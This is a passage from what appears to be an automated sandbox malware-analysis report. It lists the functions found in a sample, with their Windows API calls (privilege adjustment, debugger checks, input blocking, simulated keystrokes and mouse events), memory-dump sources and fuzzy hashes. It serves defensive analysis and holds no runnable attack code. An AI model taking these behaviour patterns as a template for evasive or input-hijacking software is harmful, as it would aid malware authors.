              • Part of subcall function 00FD29C8: GetLastError.KERNEL32(00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000,00000000), ref: 00FD29F0
            • GetTimeZoneInformation.KERNEL32 ref: 00FDBB91
            • WideCharToMultiByte.KERNEL32(00000000,?,0107121C,000000FF,?,0000003F,?,?), ref: 00FDBC09
            • WideCharToMultiByte.KERNEL32(00000000,?,01071270,000000FF,?,0000003F,?,?,?,0107121C,000000FF,?,0000003F,?,?), ref: 00FDBC36
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
            • String ID:
            • API String ID: 806657224-0
            • Opcode ID: 03ef0f4ffe5b26e9cbf148d7144fa811b6990becd5f837ff6da84edaf320a2e0
            • Instruction ID: d67da08177583d88ad4073894a79d31f286c30ba204d1dddad2a5d1e090d0712
            • Opcode Fuzzy Hash: 03ef0f4ffe5b26e9cbf148d7144fa811b6990becd5f837ff6da84edaf320a2e0
            • Instruction Fuzzy Hash: 7631C0B1D04205EFCB21DF69CC8192DBBBAFF4536071942ABE090EB3A5D7359911EB50
            Function 01008298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
            Download Yara Rule
            APIs
            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 010082AA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: lstrlen
            • String ID: ($|
            • API String ID: 1659193697-1631851259
            • Opcode ID: 527bd47c67160e1cff7f9eed15f1adb6fe9726d30de314e5de05f6c098db0658
            • Instruction ID: e016a87eb4625b2b1a97a1f6bdfbee6691729ee333257cfecdf60ca0b8c7a867
            • Opcode Fuzzy Hash: 527bd47c67160e1cff7f9eed15f1adb6fe9726d30de314e5de05f6c098db0658
            • Instruction Fuzzy Hash: 2D322574A007059FDB29CF59C481AAAB7F0FF48310B15C5AEE59ADB3A1EB70E941CB44
            Function 00FD2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • IsDebuggerPresent.KERNEL32 ref: 00FD271A
            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FD2724
            • UnhandledExceptionFilter.KERNEL32(?), ref: 00FD2731
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled$DebuggerPresent
            • String ID:
            • API String ID: 3906539128-0
            • Opcode ID: 7575418c1a8a814bc3997902138cc9c6554117450e82454132084851b2cbbece
            • Instruction ID: bed9a81b2c9cf81d1f9728e97a59c8f133aa20c160bbe90a889ad832794f1d50
            • Opcode Fuzzy Hash: 7575418c1a8a814bc3997902138cc9c6554117450e82454132084851b2cbbece
            • Instruction Fuzzy Hash: 3E31D57590121DABCB61DF64DD89B9CBBB8AF18310F5041EAE81CA7260EB349F859F44
            Function 010151CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
            Download Yara Rule
            APIs
            • SetErrorMode.KERNEL32(00000001), ref: 010151DA
            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 01015238
            • SetErrorMode.KERNEL32(00000000), ref: 010152A1
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorMode$DiskFreeSpace
            • String ID:
            • API String ID: 1682464887-0
            • Opcode ID: c3f2f3f72b2f5a83d37c288bb935bf6e5f784c44b5aa9e3b9adcf72d20194cba
            • Instruction ID: 07a94c6d4bd7e1d2da953b53175b4a7973de02f5b8ff24e6ccdc7521f91c8292
            • Opcode Fuzzy Hash: c3f2f3f72b2f5a83d37c288bb935bf6e5f784c44b5aa9e3b9adcf72d20194cba
            • Instruction Fuzzy Hash: 50312D75A00118DFDB00DF54D884EADBBF4FF4A314F048099E945AB356D736E855CBA0
            Function 010016C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FBFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00FC0668
              • Part of subcall function 00FBFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00FC0685
            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0100170D
            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0100173A
            • GetLastError.KERNEL32 ref: 0100174A
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
            • String ID:
            • API String ID: 577356006-0
            • Opcode ID: bc0649cfbbfe7fa7b48d8c18827139e11c2ae6bbf98d5577bce44cacac123e7e
            • Instruction ID: ba87268c90b848930ca220b163e946d54d08861ebbe820ab97e6292bfd4a51e8
            • Opcode Fuzzy Hash: bc0649cfbbfe7fa7b48d8c18827139e11c2ae6bbf98d5577bce44cacac123e7e
            • Instruction Fuzzy Hash: 2F1194B1504304AFE7189F54DD86DAAB7FDFB44714B10852EF09697281EB75FC458B20
            Function 0100D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
            Download Yara Rule
            APIs
            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0100D608
            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0100D645
            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0100D650
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CloseControlCreateDeviceFileHandle
            • String ID:
            • API String ID: 33631002-0
            • Opcode ID: 7f1bebced09a41c160b12d8a79f1161d6f59eeaf208d291407f7b3b54d6c73ef
            • Instruction ID: 8991eadb53240c8036b728f120a669618fdabd7b16cedbd87521dd1cc73a3ff1
            • Opcode Fuzzy Hash: 7f1bebced09a41c160b12d8a79f1161d6f59eeaf208d291407f7b3b54d6c73ef
            • Instruction Fuzzy Hash: 50117C71E01228BBEB208F999C44FAFBFBCEB49B50F108152F904E7280C2704A018BA1
            Function 01001663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
            Download Yara Rule
            APIs
            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0100168C
            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 010016A1
            • FreeSid.ADVAPI32(?), ref: 010016B1
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AllocateCheckFreeInitializeMembershipToken
            • String ID:
            • API String ID: 3429775523-0
            • Opcode ID: 5a9ba7bd82154d50ebc663d9d66457799f6eecfe2101be13a90788083b5102fd
            • Instruction ID: f13818b33eb92118051a2240e83392da7c6407b658bbff042e3fe7f997c30f3f
            • Opcode Fuzzy Hash: 5a9ba7bd82154d50ebc663d9d66457799f6eecfe2101be13a90788083b5102fd
            • Instruction Fuzzy Hash: 1EF0F47195030DBBEB00DFE49989AAEBBBCEB09604F5045A5E501E2181E775AA448B50
            Function 00FC4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • GetCurrentProcess.KERNEL32(00FD28E9,?,00FC4CBE,00FD28E9,010688B8,0000000C,00FC4E15,00FD28E9,00000002,00000000,?,00FD28E9), ref: 00FC4D09
            • TerminateProcess.KERNEL32(00000000,?,00FC4CBE,00FD28E9,010688B8,0000000C,00FC4E15,00FD28E9,00000002,00000000,?,00FD28E9), ref: 00FC4D10
            • ExitProcess.KERNEL32 ref: 00FC4D22
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process$CurrentExitTerminate
            • String ID:
            • API String ID: 1703294689-0
            • Opcode ID: e1d492e7fa919ba6d4091b4c02bab6813592c22a81e2ed3e6414b67866c19878
            • Instruction ID: fc25a572c4f75b259577b63241c3da15f631f70ebde4205ee437c8341d35e8d2
            • Opcode Fuzzy Hash: e1d492e7fa919ba6d4091b4c02bab6813592c22a81e2ed3e6414b67866c19878
            • Instruction Fuzzy Hash: ACE0BF31400149ABDF217F54DF1AF583B6DEB41751B144419FD45DA126CB3AEE51EB40
            Function 00FFD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
            Download Yara Rule
            APIs
            • GetUserNameW.ADVAPI32(?,?), ref: 00FFD28C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: NameUser
            • String ID: X64
            • API String ID: 2645101109-893830106
            • Opcode ID: ab4f3988c6cbcad51ffdeb9fb90b9f90d2428633e03c6585efff7b03ce5f68e4
            • Instruction ID: ff545a6b3440ba1498096d129733d51311b4e11739c5d792f44ec937d51f2436
            • Opcode Fuzzy Hash: ab4f3988c6cbcad51ffdeb9fb90b9f90d2428633e03c6585efff7b03ce5f68e4
            • Instruction Fuzzy Hash: 03D0C9B580111DEACB94DB90D888ED9B37CBB04345F100192F146E2000D73495489F10
            Function 00FCCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
            • Instruction ID: 8ba2cfa2e4869caf82e941a74a12b72854f971bdd9930a3c25e8296429f92022
            • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
            • Instruction Fuzzy Hash: 61021C72E0021A9BDF14CFA9C981BADBBF1EF88324F25416DD919E7380D731A941DB94
            Function 010168EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
            Download Yara Rule
            APIs
            • FindFirstFileW.KERNEL32(?,?), ref: 01016918
            • FindClose.KERNEL32(00000000), ref: 01016961
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Find$CloseFileFirst
            • String ID:
            • API String ID: 2295610775-0
            • Opcode ID: 1bc8370dd09e76952c5352094781c466dbffb482abe0e05066408fe7b348973f
            • Instruction ID: 92d730795b53fd7e43ca9b8c74366c1ae2fa22d68c697c6433cc3d6b87c30f80
            • Opcode Fuzzy Hash: 1bc8370dd09e76952c5352094781c466dbffb482abe0e05066408fe7b348973f
            • Instruction Fuzzy Hash: 3D1193716142109FD710DF29D884A16BBE5FF85328F04C699E4A98F2A6C779EC05CB91
            Function 010137B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
            Download Yara Rule
            APIs
            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,01024891,?,?,00000035,?), ref: 010137E4
            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,01024891,?,?,00000035,?), ref: 010137F4
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorFormatLastMessage
            • String ID:
            • API String ID: 3479602957-0
            • Opcode ID: fd784ac278f60da774fcd16dc377cb202732253f8a879cd0316a701bb5519d03
            • Instruction ID: e06811f6955a32ed0cafa91343cca074e7b59bb48953af36204671d6a40dded8
            • Opcode Fuzzy Hash: fd784ac278f60da774fcd16dc377cb202732253f8a879cd0316a701bb5519d03
            • Instruction Fuzzy Hash: FAF0E5716043292AE730166A8C4DFEB3AAEFFC5771F0001B5F509E2285D9649904C7B0
            Function 0100B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
            Download Yara Rule
            APIs
            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0100B25D
            • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0100B270
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: InputSendkeybd_event
            • String ID:
            • API String ID: 3536248340-0
            • Opcode ID: ba2d2b723a748eb2500a2ec741442ef1a1b31d530cb2954873f9a23c11eb4856
            • Instruction ID: 5260ada2c27d9d1669130b3b0e115ba51794334e70d8cf65393de0abe72817c1
            • Opcode Fuzzy Hash: ba2d2b723a748eb2500a2ec741442ef1a1b31d530cb2954873f9a23c11eb4856
            • Instruction Fuzzy Hash: D8F01D7580424DABEB169FA4C805BAE7FB4FF04305F00804AF995A5191C77982119F94
            Function 010010BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
            Download Yara Rule
            APIs
            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,010011FC), ref: 010010D4
            • CloseHandle.KERNEL32(?,?,010011FC), ref: 010010E9
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AdjustCloseHandlePrivilegesToken
            • String ID:
            • API String ID: 81990902-0
            • Opcode ID: 5cb74248ac4fc8c7af3114dcf5c1da57d8e1eceaa405bd4473e7a5d347e8247d
            • Instruction ID: 9ad2a9b6f3f91dc6cb469b244f6ee2952d90a7377213ea06e01fcc75efa02df1
            • Opcode Fuzzy Hash: 5cb74248ac4fc8c7af3114dcf5c1da57d8e1eceaa405bd4473e7a5d347e8247d
            • Instruction Fuzzy Hash: 33E04F32004600AEF7252B11FD05EB37BEDEB04310F10882EF5E5804B5DB67ACA0EB10
            Function 00FACAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
            Download Yara Rule
            Strings
            • Variable is not of type 'Object'., xrefs: 00FF0C40
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID: Variable is not of type 'Object'.
            • API String ID: 0-1840281001
            • Opcode ID: 311c38b67bd17d0221324373d9fc5728742104347562960aea9f18c2e4f78ae2
            • Instruction ID: d952f9af1dee73f9a0127c22f1dbc8e1353417abc16d6efafa48c586bd1486b7
            • Opcode Fuzzy Hash: 311c38b67bd17d0221324373d9fc5728742104347562960aea9f18c2e4f78ae2
            • Instruction Fuzzy Hash: 883269B5900218DFCF14DF90C980BEDB7B5BF06314F148059E916AB292DB79AE45EBA0
            Function 00FD676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FD6766,?,?,00000008,?,?,00FDFEFE,00000000), ref: 00FD6998
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ExceptionRaise
            • String ID:
            • API String ID: 3997070919-0
            • Opcode ID: 9420eb5232b2594d674bc267695045627096370db7deab6b1d9d04bab75b4f45
            • Instruction ID: 945ec2e7bacbd3523f3fdbc64ea8f30211899e8f9deb90c0196f42e4d09033be
            • Opcode Fuzzy Hash: 9420eb5232b2594d674bc267695045627096370db7deab6b1d9d04bab75b4f45
            • Instruction Fuzzy Hash: F9B15B32A106099FD715CF28C486B657BE1FF05364F298659E8D9CF3A2C739E981EB40
            Function 00FBB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID: 0-3916222277
            • Opcode ID: 699d5e8ba54ade9382d0569d5015c59091678f6013296df3d13c80defe01eb27
            • Instruction ID: 6c865d9f770e90e5b2731477aec5cb3c192cb0af8f5997ca1a807f1eeef426bd
            • Opcode Fuzzy Hash: 699d5e8ba54ade9382d0569d5015c59091678f6013296df3d13c80defe01eb27
            • Instruction Fuzzy Hash: F2125D75D00229DBCB24CF59C8807EEB7B5FF48710F14819AE949EB251EB749A81DF90
            Function 0101EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
            Download Yara Rule
            APIs
            • BlockInput.USER32(00000001), ref: 0101EABD
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: BlockInput
            • String ID:
            • API String ID: 3456056419-0
            • Opcode ID: 01d21dc2446af02adf017a6080bedeae6c9f0dc14c0495b8a5a65694d8861f65
            • Instruction ID: cc415437bc202569828085256f7dbbe160af515b18805eac9deca81dfb160edb
            • Opcode Fuzzy Hash: 01d21dc2446af02adf017a6080bedeae6c9f0dc14c0495b8a5a65694d8861f65
            • Instruction Fuzzy Hash: 8EE01A762102049FD710EF69D804E9AB7E9AF99760F048416FC8AD7256DA78B8408BA1
            Function 0100E355 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
            Download Yara Rule
            APIs
            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0100E37E
            Memory Dump Source
